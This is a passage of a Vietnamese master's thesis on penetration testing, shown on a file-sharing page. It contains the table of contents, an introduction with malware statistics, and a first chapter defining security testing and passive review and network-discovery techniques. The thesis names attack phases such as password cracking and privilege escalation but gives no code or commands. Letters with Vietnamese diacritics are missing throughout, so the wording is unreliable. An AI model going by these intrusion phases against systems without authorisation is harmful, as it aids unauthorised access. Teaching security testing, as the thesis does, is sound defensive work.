Professional Documents
Culture Documents
LV
LV
Uploaded by
Phong TrầnOriginal Title
Copyright
Available Formats
Share this document
Did you find this document useful?
Is this content inappropriate?
Report this DocumentCopyright:
Available Formats
LV
LV
Uploaded by
Phong TrầnCopyright:
Available Formats
i
MC LC
MC LC ......................................................................................................... i
NH DNG TRNH BY ............................................................................ iv
DANH MC CC T VIT TT .................................................................. v
DANH MC BNG BIU ............................................................................. vi
DANH MC CC HNH V ........................................................................ vii
M U .......................................................................................................... 1
Chng 1. TNG QUAN KIM TH AN NINH ........................................ 9
1.1. Khi nim kim th ............................................................................. 9
1.2. Khi nim v kim th an ninh ..........................................................10
1.3. Cc k thut kim th an ninh ...........................................................13
1.3.1. Cc k thut thm d ...................................................................14
1.3.2. Cc k thut nhn bit v phn tch mc tiu ..............................16
1.3.3. Cc k thut xc nhn im yu ca mc tiu ............................20
1.4. Khi nim v kim th xm nhp ......................................................21
1.5. Tm tt chng 1 ...............................................................................23
Chng 2. CC PHNG PHP KIM TH XM NHP .................... 25
2.1. Phng php OSSTMM ....................................................................26
2.1.1. Khi nim chung v thut ng .....................................................26
2.1.2. Phng php lun ........................................................................28
2.1.3. Phn tch nh lng ....................................................................32
2.1.4. Lung cng vic ..........................................................................35
ii
2.1.5. Kt lun v phng php OSSTMM ...........................................36
2.2. Phng php ISSAF ..........................................................................37
2.2.1. Gii thiu .....................................................................................37
2.2.2. Khung lm vic kim th xm nhp ISSAF ................................40
2.2.3. Kt lun v phng php ISSAF .................................................42
2.3. Phng php OWASP .......................................................................43
2.3.1. Gii thiu .....................................................................................43
2.3.2. Nguyn tc kim th ....................................................................45
2.3.3. Cc k thut kim th ..................................................................47
2.3.4. Khung lm vic kim th ca OWASP .......................................49
2.3.5. kim th xm nhp ng dng web OWASP ...............................54
2.3.6. Hng dn lm bo co nh gi ri ro thc s .........................62
2.3.7. Kt lun v phng php OWASP ..............................................65
2.4. Phng php BackTrack ....................................................................66
2.4.1. Xc nh phm vi mc tiu ..........................................................66
2.4.2. Thu thp thng tin ........................................................................66
2.4.3. Khm ph mc tiu ......................................................................67
2.4.4. Lit k cc mc tiu .....................................................................67
2.4.5. Bn l hng .............................................................................68
2.4.6. Cng ngh x hi .........................................................................69
2.4.7. Khai thc mc tiu .......................................................................69
2.4.8. Leo thang c quyn ....................................................................70
2.4.9. Duy tr truy cp ............................................................................71
iii
2.4.10. Ti liu v Bo co ....................................................................71
2.4.11. Kt lun v phng php BackTrack ........................................72
2.5. Mt s cng c kim th xm nhp ...................................................72
2.6. Cc vn v o c ngi kim th xm nhp .............................73
2.7. Tm tt chng 2 ...............................................................................76
Chng 3. NG DNG KIM TH XM NHP H THNG MNG 78
3.1. Gii thiu ...........................................................................................78
3.2. Quy trnh kim th xm nhp bng BackTrack.................................78
3.3. Xy dng h thng mng gi lp .......................................................79
3.4. Dng k thut BackTrack kim th xm nhp .............................80
3.5. Bo co v nh gi ...........................................................................88
3.6. Tm tt chng 3 ...............................................................................90
KT LUN ..................................................................................................... 91
PH LC A. THUT NG .......................................................................... 94
PH LC B. CNG THC TNH AN NINH THC T THEO RAV ..... 99
PH LC C. TI LIU THAM KHO ...................................................... 103
iv
NH DNG TRNH BY
Times New Roman c 14: Trnh by vn bn chnh
TIMES NEW ROMAN C 14: Vit tt, hoc t kha
Arial c 10: Lnh v d hay trch xut mn hnh
Times New Roman c 12: Trnh by ph lc
Times New Roman c 14: Tiu phn con, tiu hnh v, cng thc, v
tn phn mm.
[x] hoc [ix]: Ch mc ti liu tham kho v tham kho Internet
v
DANH MC CC T VIT TT
CNTT Cng ngh thng tin
CSDL C s d liu
IDS Intrusion detection system (h thng pht hin xm nhp)
IPS Intrusion prevention system (h thng ngn chn xm nhp)
ISSAF Information systems security assessment framework
HH H iu hnh operating system
KTAN Kim th an ninh
KTXN Kim th xm nhp
NIST National institute of standards and technology
OSSTMM Open source security testing methodology manual
OWASP Open web application security project
SAN Storage Area Network (h thng lu tr trn mng)
SDLC Software Development Life Cycle (vng i pht trin phn mm)
VPN Virtual Private Network (mng ring o)
WASC-TC Web application security consortium threat classification
WLAN Wireless Local Area Network (mng LAN khng dy)
vi
DANH MC BNG BIU
Bng 1: Cc knh tng tc ............................................................................ 29
Bng 2: M t cc kiu kim th .................................................................... 30
Bng 3: Cc i lng c bn dng trong tnh an ninh thc t ...................... 35
Bng 4: Mu minh ha bi vit hng dn kim th ..................................... 56
Bng 5: Xc nh mc ri ro ..................................................................... 63
Bng 6: Bng tnh kh nng tng th .............................................................. 63
Bng 7: Bng tnh tc ng tng th .............................................................. 63
Bng 8: Bng tnh mc nghim trng ri ro tng th ................................ 64
Bng 9: Kt qu KTXN .................................................................................. 89
Bng 10: nh gi cng c dng trong KTXN .............................................. 89
Bng b-1: Cng thc tnh cc i lng tnh SecLim_sum ......................... 101
vii
DANH MC CC HNH V
Hnh 1: Phn tch t l cc loi m c (ngun www.pandasecurity.com) ...... 3
Hnh 2: S phn loi KTAN ...................................................................... 12
Hnh 3: Khi qut m hnh OSSTMM ........................................................... 27
Hnh 4: Cc kiu kim th .............................................................................. 29
Hnh 5: Quy trnh kim th an ninh hot ng ............................................... 31
Hnh 6: File Excel tnh RAV...................................................................... 33
Hnh 7: Lung cng vic duy nht (p dng cho tt c cc kiu KTAN) ...... 36
Hnh 8: S phng php KTXN ca ISSAF ............................................. 41
Hnh 9: Ca s bc l ca l hng .................................................................. 47
Hnh 10: K thut kim th p dng trong cc giai on SDLC ................... 49
Hnh 11: Lung cng vic trong khung kim th OWASP ........................... 54
Hnh 12: Phn mm Integrigy ......................................................................... 58
Hnh 13: Minh ha ly quyn DBA ................................................................ 60
Hnh 14: Minh ha quy trnh KTXN BackTrack ........................................... 79
Hnh 15: S mng gi lp .......................................................................... 80
Hnh 16: Qut l hng bng Nessus ............................................................... 82
Hnh 17: Qut l hng bng NeXpose ............................................................ 82
Hnh 18: dng website b mt khu ............................................................... 85
1
M U
1. L do chn ti
Kim th ni chung v kim th an ninh (KTAN) ni ring l mt phn
ngnh kh mi m trong lnh vc cng ngh thng tin (CNTT) ti Vit nam. Trc
y, lnh vc ny hu nh cha c quan tm ng mc. C nhiu l do, nhng
nhng l do chnh c th k ra l, th nht ngnh cng ngh phn mm ca chng
ta cn kh non tr, pht trin mt cch manh mn, t pht, dn n ngi lp trnh
ch lo hon thin chng trnh vi y yu cu khch hng theo ch ch quan
ca mnh l chnh v hu nh ph thc trch nhim kim tra li, tnh ng n
chng trnh v m bo ng yu cu chc nng chng trnh cho khch hng.
Th hai, mc ph thuc trong cc hot ng ca t chc, c nhn v doanh
nghip vo CNTT cha cao dn n gi tr ti sn CNTT kh nh nn cc mi e
da v an ninh CNTT nu xy ra cng khng gy hu qu nghim trng, v vy
nhu cu v an ninh h thng thng tin khng ln lm.
Ngy nay, cng vi s hi nhp vo nn kinh t th gii, ngnh cng ngh
phn mm nc ta cng pht trin nhanh hn theo hng cng nghip ha. Nh
pht trin phn mm buc phi kim sot nng cao cht lng sn phm phn mm
ca mnh nhm p ng nhu cu ngy cng cao ca khch hng trong nc cng
nh yu cu tun th quy trnh pht trin phn mm ca khch hng nc ngoi.
Ngoi ra, vi xu hng cng nghip ha khng th trnh khi trong ngnh sn xut
phn mm. Ngy cng c nhiu cng ty chuyn v kim th phn mm ra i, p
ng nhu cu thu ngoi thc hin cng on kim th trong cc quy trnh pht trin
phn mm ca Vit nam v th gii.
Mt khc vi s pht trin nhanh chng ca Internet v vin thng, cc doanh
nghip, t chc ngy cng ph thuc vo mng ton cu ny, dn n nhu cu m
2
bo an ton ti sn (d liu, thit b CNTT) ca cc t chc ny trc nhng nguy
c b xm hi an ninh trn mng ngy cng cp bch. Vic a vo s dng mt
phn mm trn h thng khng nhng i hi phi c kim tra k lng cc li
c th c ca phn mm c a vo m cn m bo chnh phn mm khng
gy mt an ninh cho ton h thng.
V vy, b phn kim th khng nhng phi c trch nhim kim tra, pht
hin li ca phn mm hay phn mm khng hot ng ng yu cu chc nng
m cn phi KTAN cho phn mm nhm pht hin nhng nguy c ri ro c th
gy mt an ninh cho h thng.
Mt hng khc ca KTAN l kim th xm nhp (KTXN), y l qu trnh
thc hin KTAN mc cao nht. KTXN nhm tp trung tm kim v khai thc l
hng, im yu, chng minh cc l hng an ninh c th b ngi ngoi hoc k
xu li dng vi mc ch xm nhp, khai thc, ph hoi, ng thi cng nh gi
mc tn tht nu vic xm nhp c thc hin thnh cng.
Ngoi ra, an ninh l mt qu trnh c thc hin trong sut qu trnh hot
ng ca h thng thng tin ch khng ch l cng vic thit lp, cu hnh an ninh
ban u hay n gin l u t cng ngh an ninh mi. V vic mt t chc, cng
ty nh gi mc an ninh ca chnh h nhiu khi khng c khch quan, nn
ny sinh nhu cu s dng dch v KTAN v KTXN.
Nhng s liu sau y cho thy mt hnh nh r hn v tnh hnh an ninh
CNTT trn th gii v trong nc. Theo bo co mi nht trong qu II nm 2012
ca phng th nghim Panda:
- Hn 6 triu mu m c hi c to mi trong qu II/2012.
- Ba phn t m c l Trojan.
- Bin th mi ca virus Policy xut hin.
3
Hnh 1: Phn tch t l cc loi m c (ngun www.pandasecurity.com)
Cc nc b nhim m c nhiu nht tp trung Chu vi ba nc ng
u ln lt l Hn Quc, Trung Quc v i Loan [i26]. 78% cc m c hi
nhm vo d liu ngi dng, 70% cc mc tiu l ngn hng cho thy mc ch
ca tin tc khng cn l s thch na m l li ch kinh t [23]. c tnh rng, cc
cng ty mt khong 0,5 n 2,5% doanh thu ca h v cc thit hi lin quan n
an ninh v thi gian cht. T thng 09/2009 n thng 03/2010, Hc vin Ponemon
tin hnh mt cuc kho st s liu bo co vi phm Hoa K, Vng quc Anh,
c, Php v Australia. Thit hi trung bnh t cc cng ty c kho st l 3,425
triu la cho mi vi phm, thit hi trung bnh chi ph 142 la /ngi. Cc mi
e da ln nht t nhn vin b sa thi v cc cuc tn cng t bn ngoi cng
ty [23].
Tip theo, sau y l mt vi s liu chung v tnh hnh virus v an ninh mng
ti Vit Nam nm 2011 (ngun BKAV [i9]):
- 64,2 triu lt my tnh ti Vit Nam b nhim virus l tng kt nm 2011
t H thng gim st virus ca Bkav. Trung bnh mt ngy c hn 175
nghn my tnh b nhim virus.
4
- Nm 2011, c 38.961 dng virus xut hin mi, ly lan nhiu nht l
virus W32.Sality.PE. Virus ny ly nhim trn 4,2 triu lt my tnh.
- Cng trong nm 2011, c 2.245 website ca cc t chc ti Vit Nam b
tn cng. Trung bnh mi thng c 187 website b tn cng.
- Nm 2012 s tip tc chng kin s bng n ca virus in thoi di ng.
- Trong nm 2012, nu cc b my qun l nh nc v an ninh mng ca
Vit Nam vn cha hon thin nh hin nay, nhng cuc tn cng ny
khng nhng cn tip din m c nguy c khng kim sot c.
Tm li, vi nhu cu thc t v cht lng sn phm phn mm ngy cng
cao ca ngi s dng, mc ph thuc cng nh gi tr ti sn CNTT ca h
ngy cng ln, cng vi s gia tng cc v tn cng mng, lnh vc KTAN v
KTXN c cc t chc, c nhn cc gii nghin cu ln doanh nghip ngy
cng quan tm nghin cu. Hin c nhiu cng trnh nghin cu lin quan v nhiu
phng php lun KTAN c nghin cu v p dng trong thc t nh:
- Open source security testing methodology manual (OSSTMM).
- Information systems security assessment framework (ISSAF).
- Open web application security project (OWASP).
- BackTrack testing.
Vi mi phng php lun nh trn, mt s hoc mt b cc cng c KTAN
c gii thiu km theo phc v cho phng php .
phng chng trm th phi suy ngh nh k trm. Hiu c t duy ca tin
tc cng nh cch chng nhn vo h thng mng ca chng ta th mi phng
chng thnh cng. l l do ti chn ti: Nghin cu kim th xm nhp cc
h thng mng my tnh.
2. Mc tiu v nhim v nghin cu
5
Mc tiu ca ti:
Tm hiu cc k thut KTAN.
Nghin cu cc phng php lun v k thut KTXN.
Dng cng c BackTrack thc hin mt KTXN trn h thng mng
gi lp v a ra bo co an ninh da trn kt qu kim th ca h
thng .
Nhim v chnh ca ti bao gm:
Nghin cu cc l thuyt v KTAN.
Nghin cu cc h thng quy trnh KTXN v cc cng c h tr.
Thc nghim KTXN bng cng c BackTrack.
3. i tng v phm vi nghin cu
i tng nghin cu bao gm:
Cc vn v an ninh mng v KTAN.
Cc phng php lun KTAN (OSSTMM, ISSAF, OWASP, v
BackTrack)
S dng BackTrack 5 R1 trong KTXN.
Phm vi nghin cu:
Lnh vc KTAN v KTXN.
4. Phng php nghin cu
An ninh cho mt h thng CNTT thng c hiu l m bo tnh b mt d
liu (confidentiality), tnh ton vn (integrity), tnh sn sng (availability) v tnh
trch nhim (accountability) ca h thng CNTT khng b vi phm [8]. KTAN
6
cng pht hin ra nhng khim khuyt, sai st ca h thng c th vi phm
nhng c tnh trn. Nhng nghch l l KTXN li c li dng, khai thc nhng
khim khuyt v sai st ph v nhng c tnh trn.
Lun vn trnh by nhng vn cn bn xung quanh khi nim KTAN v
KTXN. Tp trung vo cc phng php KTXN, phn tch u, nhc im ca
tng phng php. S dng cng c KTXN ph bin hin nay l BackTrack
thc nghim KTXN vo mt h thng mng gi lp nhm pht hin nhng im
yu v chng minh tc hi ca im yu nu khng c khc phc kp thi.
Phng php ti liu:
Tm hiu c s l thuyt v an ninh v an ninh mng.
Tm hiu, nh gi u nhc im ca cc phng php lun KTAN
(OSSTMM, ISSAF, OWASP, v BackTrack).
Phng php thc nghim:
Xy dng mt h thng mng gi lp.
Vn dng mt trong cc phng php lun nu trn (c th l
BackTrack) thit k v thc hin mt ca KTXN.
T kt qu KTXN trn a ra bo co nh gi an ninh h thng.
5. ngha khoa hc v thc tin
ngha khoa hc:
Khi qut c cc phng php lun KTAN v KTXN.
Gii thiu mt cch tng quan cc k thut kim tra v kim sot an
ninh cho cc h thng CNTT.
ngha thc tin:
7
ti tp trung vo vn nng hin nay l an ninh mng CNTT v
cch pht hin, nh gi nhng l hng trong mng my tnh ca t
chc. Gip h c cch nhn a chiu hn i vi s an ton ti sn
CNTT ca mnh.
6. B cc lun vn
Lun vn c trnh by bao gm cc chng nh sau :
Chng 1. Tng quan kim th an ninh
Chng 1 tp trung gii thiu khi nim kim th, KTAN, KTXN v cc k
thut KTAN nh k thut thm d, pht hin mc tiu, pht hin l hng,
Chng ny gii thiu mt hnh thc KTAN c bit l KTXN. Ngi kim
th ng gc nhn ca hacker c tm cc l hng ca h thng li dng khai
thc nhm ph hoi, xm nhp. Qua gip ngi qun tr h thng thy c v
khc phc nhng l hng , ng thi cng thy c hu qu, tn tht nu cc l
hng, im yu c th b k xu li dng.
Chng 2. Cc phng php kim th xm nhp
Chng 2 gii thiu cc phng php lun KTAN, tp trung vo KTXN,
c ra bi cc cng ng m ca cc chuyn gia an ninh, chuyn gia CNTT,
nh qun l, pht trin phn mm, qun tr mng, Mi phng php lun tp
trung vo tng loi mc tiu kim th khc nhau, nhm gip nhng ngi KTAN
c mt cch lm vic nht qun v khoa hc, qua gim thi gian kim th v
tng nng sut.
Chng ny cng gii thiu cc cng c KTXN in hnh v cp n cc
quy tc o c ngh nghip KTXN nhm ngn chn s dng thng tin l hng,
8
im yu hoc khai thc im yu vi mc ch t li c nhn, hoc cc tha thun
khng cng b trnh cho thng tin nhy cm v h thng b ri vo bn th ba.
Chng 3. ng dng kim th xm nhp cc h thng mng
Chng 3 gii thiu b cng c BackTrack, l b cng c c s dng rt
rng ri KTAN. y l nhm cc phn mm ng dng c ci sn trong HH
Linux BackTrack da trn bn phn phi ni ting l Ubuntu. Cc k thut KTXN
da trn cng c c trong BackTrack.
Phn ny s xy dng mng gi lp vi cc thnh phn mng v dch v thng
thng lm mc tiu KTXN. Thit k mt k hoch kim th, sau s dng cc
cng c nu trn thc hin mt quy trnh kim th. Cui cng a ra bo co nh
gi tnh trng an ninh da trn kt qu kim th.
9
Chng 1. TNG QUAN KIM TH AN NINH
Vic kim th hin nhin l tm ra li v thiu st nhm sa cha nhng
li . KTAN l tm ra li trong mt h thng CNTT (my tnh, thit b mng,
dch v, phn mm, sau y gi tt l h thng) bao gm cc li c th c trong
qu trnh thit k, ci t, cu hnh v vn hnh mng my tnh, dch v v phn
mm chy trn . Chng ny nh ngha cc khi nim u tin lin quan n
kim th ni chung v KTAN ni ring. Chng 1 cng trnh by cc k thut
KTAN nh qut l hng, KTXN v phn bit gia chng vi nhau, ng thi i
su chi tit hn v cc vn lin quan n KTXN.
1.1. Khi nim kim th
Xung quanh cc khi nim kim th c cc nh ngha nh sau:
Theo Myers [1], kim th l tin trnh thc thi mt chng trnh vi mc ch
tm ra li.
Kim th l tin trnh vn hnh h thng hoc thnh phn ca h thng di
nhng iu kin xc nh, quan st hoc ghi nhn kt qu v a ra nh gi v h
thng hoc thnh phn [17].
Kim th c m t l cc th tc c thc hin nhm nh gi mt vi
mt ca phn mm [18].
Bao trm ln tt c, c th coi kim th l hnh ng tm ra li vi mc ch
lm phn mm c tt hn. Theo quan nim thng thng ca ngi pht trin
phn mm l: kim th pht hin li l khng thnh cng v ngc li l thnh
cng. Tuy nhin, theo nh ngha ca Myers, tc l ng trn quan im ngi
kim th, th kim th m khng pht hin c li c coi l khng thnh cng,
ngc li nu kim th pht hin c li c coi l thnh cng [16]. R rng,
ngi pht trin phn mm c vit mt phn mm tt nht v khng c li, cn
10
ngi kim th c tm ra li ca phn mm c vit ra. Nh vy, mc ch ca
kim th l phn bin li pht trin phn mm nhm mc ch lm cho phn
mm tt hn. Bi v trong thc t, khng c phn mm no m khng c li.
Ngoi ra, cng cn phi phn bit s khc nhau gia hai hot ng kim th
v g ri (debugging). Kim th nhm mc ch pht hin li, trong khi g ri
c thc hin mt khi kim th pht hin c li. G ri gm hai bc: bc 1
xc nh bn cht li v nh v li trong chng trnh, bc 2 tin hnh sa li.
Tm li, kim th nhm thc hin mc ch pht hin ra li trong phn mm
(vi gi thit s tn ti li trong phn mm). Kim th pht hin c li s gp
phn nng cao cht lng ca phn mm.
1.2. Khi nim v kim th an ninh
KTAN phn mm hay mng l mt loi kim th c bit nhm mc ch
thm tra v xc nhn phn mm hay mng c t yu cu v an ninh khng.
Nh vy, hng nghin cu KTAN cng chia lm hai hng, l KTAN phn
mm [18][19][22] v KTAN mng [3][10][11]. KTAN phn mm l mt loi kim
th trong qu trnh kim th gip nhn bit phn mm ang xt c nhng c
tnh an ninh ng vi yu cu thit k t ra cn c trn c t yu cu an ninh cho
n hay khng. C hai hng tip cn chnh ca KTAN phn mm l: KTAN chc
nng v KTAN im yu [19]. KTAN chc nng dng kim tra chc nng an
ninh ca phn mm (xc thc, phn quyn, m ha, iu khin truy cp, audit,)
nhm m bo phn mm hot ng ng chc nng, hiu qu v sn sng nh
thit k v pht trin hay khng. Loi kim th ny cn phi tin hnh ngay t giai
on u ca vng i pht trin sn phm phn mm (SDLC). SDLC bao gm thu
thp v phn tch yu cu, thit k, lp trnh, v phi duy tr trong sut SDLC.
KTAN im yu (hay KTXN) thc hin nh mt k tn cng nhm pht hin
nhng im yu an ninh ca phn mm [19]. im yu phn mm y l nhng
thiu st trong thit k, thc thi, qun l phn mm. V d mt sai st khi lp trnh
11
lm phn mm c th c ng nhp khng cn xc thc. KTAN im yu phn
mm trc tip nhn din v khm ph nhng im yu h thng vn cha c
bit c th gy ra bi nhng thit st thit k hay li lp trnh, thut ton. Hng
tn cng c th l qua mng hoc cc b, nhng ch yu l cc b. C nhiu
phng php KTAN phn mm nh lit k sau y [19]: KTAN hnh thc (formal
security testing); KTAN da vo m hnh (model-based security testing); KTAN
da vo li chn (fault injection-based security testing); KTAN m (fuzzy testing);
Kim th qut l hng (vulnerability scanning testing); Kim th da vo thuc
tnh (property-based testing); KTAN da vo hp trng (white box-based security
testing); KTAN da vo ri ro (risk-based security testing).
KTAN mng l nhng hot ng nhm cung cp thng tin v s an ton v
ton vn ca mng my tnh v nhng thit b mng lin quan ca t chc no
thng qua vic xc minh v xc nhn nhng iu kin an ninh h thng u hot
ng bnh thng. KTAN mng bao gm hai loi chnh l: qut l hng
(vulnerability scanner) [3][20][21][i10] v KTXN [3][9][23][24]. Trong qut l
hng l qu trnh tm nhng im yu, l hng an ninh trong mng ca t chc,
cng ty hoc c nhn [20]. tng c bn ca loi hnh KTAN ny l qut ton b
nt mng v cng c trn tng nt mng, sau vi thng tin nhn c n s
phn tch v nh gi h thng an ton nh th no. Thut ng nh gi l hng
c s dng trong trng hp qut l hng c ngha l qu trnh tm kim
nhng du hiu bit ca l hng bn trong hoc bn ngoi mt mng. Qu trnh
ny s xc nh l hng c th loi b trc khi n b chng trnh c hi hoc
tin tc khai thc. Trong hu ht trng hp, cc l hng u c bit v do c
th c tm thy. Cc l hng to thnh mi e da trong mng bao gm li phn
mm, dch v khng cn thit, cu hnh sai hoc ti khon ngi dng khng an
ton. C mt thc t l nhng l hng n l c nguy c v an ninh khng cao
nhng khi tn ti chung trong mt h thng c th tr thnh l hng ln, gy ra
nhng nguy c v ri ro an ninh rt cao. V vy, KTXN l mt thnh phn ca
12
KTAN, tuy nhin n i xa hn so vi qut l hng, n tp trung vo qu trnh khai
thc, li dng cc l hng, im yu nhm xm nhp tri php, leo thang c
quyn, duy tr truy cp vo h thng mc tiu, hoc tm ra s tn ti tng h ca
cc l hng trn mt hoc nhiu h thng to ra s truy cp vo h thng m
thng kh t c khi khai thc nhng im yu n l. Ni cch khc, qut l
hng ch ra s tn ti ca l hng v c th phn tch mc ri ro nhng khng
xem xt cc mi e da li dng khai thc l hng gy hi ti h thng. Cn
KTXN quan tm n cch nhn cc vn an ninh ca h thng theo quan im
ca k tn cng. Ty vo loi KTAN mng v phng php s dng, c th s
dng nhng k thut sau: qut cng, lp bn mng (network mapping), qut l
hng (vulnerability scanner), b mt khu (password crack), khai thc, leo thang
c quyn, duy tr truy cp, qut virus,
Hnh 2: S phn loi KTAN
Thng qua s - hnh 2 c hai loi KTAN phn mm v KTAN mng u
c KTXN nhng vi mc tiu khc nhau tng ng l h thng phn mm v
mng. Phm vi nghin cu ca lun vn lin quan n KTXN mng v nhng phn
mm, dch v hot ng trn mng, v c gi tt l KTXN.
KTAN
KTAN phn mm
KTAN mng
KTAN
chc
nng
KTAN
im
yu
(xm nhp)
Qut
l
hng
KTXN
mng
13
Tm li, mt cch tng quan, ta thy quan h ca an ninh v KTAN cng
ging nh quan h gia pht trin phn mm v kim th phn mm. Trong khi
nhng nghin cu v an ninh vi mc tiu xy dng h thng t nhng tiu ch
ca an ninh l b mt, hiu qu, sn sng v trch nhim (xem chi tit an ninh
phn thut ng), th KTAN chuyn nghin cu nhng phng php v k thut
pht hin nhng im yu v an ninh hoc nhng phng php gy tn thng h
thng an ninh nhm xm nhp vo h thng nh KTXN. Ngoi ra, khng ging
nh kim th phn mm thng tp trung thc hin trong cc giai on pht trin,
KTAN thng din ra trong c giai on pht trin ln giai on hot ng hay
giai on sng ca h thng nhng tp trung ch yu giai on sng, v phi
thc hin sut vng i hot ng ca mng hay phn mm.
1.3. Cc k thut kim th an ninh
C rt nhiu k thut KTAN khc nhau c th dng nh gi an ninh ca
h thng. Da vo mc tiu s dng, c th phn loi cc k thut trn thnh
nhng loi nh sau theo ti liu hng dn k thut kim th v nh gi an ninh
thng tin [24] chia thnh ba loi:
K thut thm d (review techniques).
K thut nhn bit v phn tch mc tiu.
K thut xc nhn im yu ca mc tiu.
Cc k thut trnh by sau y c th l nhng k thut thun cng ngh hoc
nhng k thut phi cng ngh, v d lp danh sch nhng my tnh vt l trong mt
mng. Cn ch quan trng na l khng c mt k thut no c th cung cp y
thng tin v an ninh ca h thng, v phi phi hp cc k thut m bo t
c mc tiu KTAN chnh xc. Ngoi ra, mt k thut c nhiu cng c do
nhiu t chc, c nhn pht trin, v vy ngi kim th khng nn ch da vo
14
mt cng c m phi thc hin nhiu ln vi nhiu cng c khc nhau m bo
chnh xc.
1.3.1. Cc k thut thm d
K thut thm d thng dng giai on u trong qu trnh KTAN. Mc
ch l kim tra th ng cc h thng nhm nhn bit h thng v tm ra cc
im yu v an ninh trn h thng [24]. Hu ht cc k thut thm d l th
ng nn chng t gy nguy c v an ninh cho h thng. Cc k thut thm d
gm c:
Xem xt ti liu (documentation review):
Ti liu y l nhng chnh sch v th tc an ninh hin hnh. N cung cp
tnh hnh an ninh h thng mc c bn nht, tuy nhin chng thng b b
qua khi thc hin KTAN. S xem xt ny c th gip tm ra nhng chi tit khng
khp v im yu c th gy ra mt an ninh. Nhng im yu thng thng khi
xem xt ti liu c th l nhng th tc an ninh cho HH hoc nhng giao thc
hoc dch v khng cn dng. Ch l xem xt ti liu khng m bo nhng
kim sot an ninh thc hin ng, n ch gip h tr h tng an ninh ang c.
ng thi nhng kt qu t hot ng ny c th c dng cho giai on sau. V
d, chnh sch an ninh yu cu khng c dng mt khu di di 8 k t, thng
tin ny c th gip ta tit kim thi gian khi b mt khu trong KTXN.
Xem xt log (log review):
Xem xt log nhm xc nh nhng kim sot an ninh c ghi li nhng thng
tin chnh xc hay khng v t chc c tun th chnh sch qun l log. Xem xt log
gip xc nhn h thng c tun th cc chnh sch ra. V d, nu chnh sch an
ninh yu cu tt c nhng ln ng nhp vo nhng my ch quan trng phi c
ghi li, xem xt log s cho php xc nh nhng thng tin ny c c ghi li ng
15
nh yu cu hay khng. Ngoi ra, xem xt log cng c th pht hin nhng vn
nh cu hnh sai, truy cp v xm nhp khng php. Hu ht d liu log pht sinh
rt ln nn xem xt log bng phng php th cng s rt tn thi gian. Nn c
nhng cng c t ng c kh nng gim kh nhiu thi gian xem xt cng nh
pht sinh bo co tng hp. Cc cng c cng cho php lc bt hoc tm kim cc
hot ng cn thit nhm tng hiu qu xem xt log. Nhng cng c ph bin nh
event viewer, Cisco Security Monitoring, Analysis and Response System (MARS),
Consul InSight, Netcool/NeuSecure, NetIQ Security Manager, Sentinel, xem
thm chi tit trong ti liu NIST SP 80092, Guide to security log management
[i11].
Xem xt b qui tc (ruleset review):
B qui tc l mt tp hp cc qui tc hoc nhng du hiu c lu tr nhm
mang ra so snh hoc i chiu vi lung thng tin qua mng hoc thit b mng
xc nh hnh ng thch hp v d nh mt gi tin c php i tip hoc b
chn li, mt cnh bo pht sinh. S xem xt ny cho php pht hin nhng im
yu v l hng trn thit b an ninh, ng thi cng cho php kim sot nhng nh
hng tiu cc n hiu nng hot ng ca mng gy ra bi cc b qui tc.
Xem xt cu hnh h thng (system configuration review):
L qu trnh nhn bit nhng im yu trong cu hnh ca cc kim sot an
ninh. Thng qua xem xt cu hnh h thng c th b l nhng khim khuyt an
ninh v d nh h thng khng c cu hnh hoc nng cp ph hp vi chnh
sch an ninh; nhng dch v hoc ng dng khng cn thit; ti khon ngi dng
khng ph hp C th dng k thut th cng da trn hng dn cu hnh an
ninh v thit lp cu hnh khuyn co checklist [i12] thc hin xem xt cu
hnh h thng. Nhng thit lp khng ph hp th nh du v bo co. Ngoi ra,
cn c cc cng c t ng cho php thu thp v bo co nhng thit lp an ninh
16
v cung cp hng dn sa cha nu c. V d nh SCAP [i13]. Xem xt cu hnh
h thng t ng r rng nhanh hn th cng, tuy nhin vn c nhng trng hp
cn kim tra th cng. C hai phng php th cng v t ng u cn quyn
qun tr xem xt (administrator vi Windows v root vi Unix/Linux).
Thm d mng (network sniffing):
L k thut th ng gim st cc lung thng tin trn mng, n bao gm
bt, nhn bit v gii m giao thc, kho st ni dung gi tin (c header v
payload) pht hin thng tin cn quan tm. Cc cng c dng cho k thut thm
d mng gi l sniffer. Thm d mng i lc cng c s dng nh cng c pht
hin v phn tch mc tiu. Nhn chung, thm d mng t nh hng n h thng.
Dng thm d mng hiu qu nht khi kt ni vi hub hoc tap hoc cng thm d
(spanning) ca switch. Nhc im ca thm d mng l khng c c gi tin
m ha, hot ng gii hn trong mt phn on mng, yu cu Ngi kim th c
trnh cao.
Kim tra ton vn file (file integrity checking):
pht hin cc file c b thay i khi lu tr hoc truyn trn ng truyn
bng cch tnh ton v lu d liu kim tra tng (checksum) hoc gi tr bm
(hash) cho mi file cn bo v. kim tra ton vn, cn tnh ton li gi tr
checksum hoc hash ca file sau so snh vi d liu lu tr ca file . u
im l khng cn nhn lc qun l trnh cao. Nhc im l nu file thay i
thng xuyn th d liu tham kho cng phi cp nht thng xuyn.
1.3.2. Cc k thut nhn bit v phn tch mc tiu
Cc k thut pht hin v phn tch mc tiu (target identification and
analysis techniques) tp trung vo vic nhn bit nhng thit b v cng v dch v
lin quan n thit b , sau phn tch nhng im yu tim tng. Cc k thut
17
ny c th l cng ngh hoc phi cng ngh [24]. Mt v d ca k thut phi cng
ngh l quan st bng mt thng pht hin thit b trn mt mng. Cc k thut
c th c phn thnh cc loi sau y:
Kho st mng (network discovery):
Kho st mng l k thut tm hiu mng v cc thnh phn hot ng trn
mng. C hai k thut chnh dng kho st mng l th ng (passive) v ch
ng (active). K thut th ng thng dng mt thit b thm d gim st
lung thng tin, qua cung cp nhng thng tin nh a ch IP ang dng;
cng/dch v ang m trn ; HH no ang c my ch s dng; quan h
gia cc my ch. K thut ch ng cn gi mt vi gi tin n mc tiu (v d
ICMP ping, SYN, FIN, NULL, ) v thu thp cc thng tin phn hi t mc tiu
phn tch. K thut ny d b cc thit b tng la hay IDS pht hin nn ngi
kim th cn cn thn khi dng. u im ca k thut th ng l khng nh
hng n mng do khng cn gi nhng gi tin thm d, y cng chnh l nhc
im ca k thut ch ng do k thut ny hay pht sinh nhiu trn mng. Nhc
im ca k thut th ng l tn nhiu thi gian v thit b khng truyn thng tin
trn mng th khng b pht hin, trong khi k thut ch ng tn t thi gian
hn, c th dng trn nhiu mng khc nhau. Vi c hai kiu th ng v ch
ng, thng tin nhn c him khi hon ton chnh xc. khc phc nn thc
hin kho st thng xuyn v lp lch chy cc phn mm kho st t ng.
Kho st mng cng c th pht hin nhng thit b, dch v gi mo trn mng
